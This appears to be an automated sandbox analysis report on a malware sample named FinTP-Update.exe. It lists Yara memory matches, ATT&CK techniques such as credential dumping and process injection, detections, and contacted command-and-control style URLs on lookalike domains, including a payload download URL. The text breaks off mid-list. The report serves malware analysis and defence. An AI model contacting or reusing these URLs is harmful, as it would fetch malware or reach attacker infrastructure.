          Source: Yara matchFile source: 00000000.00000003.2146934434.0000017F36AE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2266293573.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3187878784.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: FinTP-Update.exe PID: 1276, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading          		1
          Process Injection          		1
          Process Injection          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism          		1
          Abuse Elevation Control Mechanism          		LSASS Memory1
          Query Registry          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		1
          Obfuscated Files or Information          		Security Account Manager11
          Security Software Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS1
          Account Discovery          		Distributed Component Object ModelInput Capture113
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          System Owner/User Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials3
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          FinTP-Update.exe8%ReversingLabs
          FinTP-Update.exe100%AviraHEUR/AGEN.1317301

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ec2-3-79-209-76.eu-central-1.compute.amazonaws.com
          		3.79.209.76
          		truetrue
            		unknown
            www.flntp.ro
            		unknown
            		unknowntrue
              		unknown
              www.finttp.ro
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.finttp.rotrue
                  		unknown
                  https://www.flntp.ro/rss/portallogin-gettask.htmltrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.flntp.ro/rss/portallogin-gettask.htmlCFinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B54000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://www.flntp.ro/rss/portallogin-gettask.htmlmtFinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://www.flntp.ro/ptographyFinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://www.flntp.ro/rss/portallogin-gettask.htmlmwFinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.flntp.ro/rss/portallogin-gettask.htmlPtFinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.finttp.ro/deFinTP-Update.exe, 00000000.00000002.3358210766.0000017F3890B000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://www.flntp.ro/rss/portallogin-gettask.htmlr&)FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://www.flntp.ro/rss/portallogin-gettask.htmlJFinTP-Update.exe, 00000000.00000003.2170181010.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243779777.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266293573.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313315862.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651458102.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221645510.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491486119.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188050658.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403086446.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299179602.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720594519.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3344304389.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.finttp.ro/FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221796771.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403144196.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313366127.0000017F3890E000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380628110.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3358210766.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2199716524.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.finttp.ro/rss/portallogin-gettask.htmlAwtdFinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.finttp.ro/rss/portallogin-gettask.htmlhi%?FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://www.flntp.ro/MwxdFinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.finttp.ro/rss/portallogin-gettask.htmlz1FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://www.flntp.ro/rss/portallogin-gettask.htmlderPtFinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.flntp.ro/.finttp.ro/rss/portallogin-gettask.htmlrFinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.flntp.ro/rss/portallogin-gettask.htmlO~FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313366127.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.flntp.ro/rss/portallogin-gettask.htmlgFinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.finttp.ro/rss/portallogin-gettask.htmlr&)FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.flntp.ro/rss/portallogin-gettask.htmlz1FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.flntp.ro/rss/portallogin-gettask.htmlk~FinTP-Update.exe, 00000000.00000003.2221796771.0000017F3890B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://www.flntp.ro/rss/portallogin-gettask.htmlPFinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://www.finttp.ro/rss/portallogin-gettask.htmlFtFinTP-Update.exe, 00000000.00000003.2403144196.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380628110.0000017F38910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://www.finttp.ro/rss/portallogin-gettask.htmlk~FinTP-Update.exe, 00000000.00000003.2199716524.0000017F3890B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.flntp.ro/fintp.x64.bin8Z:BFinTP-Update.exe, 00000000.00000002.3357638321.00000018C64FC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://www.flntp.ro/FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243779777.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266293573.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313315862.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651458102.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403144196.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221645510.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491486119.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188050658.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403086446.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299179602.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720594519.0000017F36C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.flntp.ro/rss/portallogin-gettask.html)pFinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://www.flntp.ro/VFinTP-Update.exe, 00000000.00000003.2170181010.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243779777.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266293573.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313315862.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651458102.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221645510.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491486119.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188050658.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403086446.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299179602.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720594519.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3344304389.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36C24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://www.finttp.ro/rss/portallogin-gettask.htmlFinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://www.flntp.ro/rss/portallogin-gettask.htmlctFinTP-Update.exe, 00000000.00000003.2221796771.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.finttp.ro/rss/portallogin-gettask.html011b87bd06FinTP-Update.exe, 00000000.00000002.3358210766.0000017F388E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://www.flntp.ro/rss/portallogin-gettask.htmltFinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://www.flntp.ro/rss/portallogin-gettask.htmlrFinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.flntp.ro/fintp.x64.binUpdatingFinTP-Update.exefalse
                                                                                      		unknown
                                                                                      http://www.flntp.ro/fintp.x64.binFinTP-Update.exefalse
                                                                                        		unknown
                                                                                        https://www.finttp.ro/rss/portallogin-gettask.htmltFinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://www.finttp.ro/htmlFinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://www.flntp.ro/.finttp.ro/deFinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313366127.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://www.finttp.ro/rss/portallogin-gettask.htmlvFinTP-Update.exe, 00000000.00000003.2313200724.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266186373.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2288264868.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335299936.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 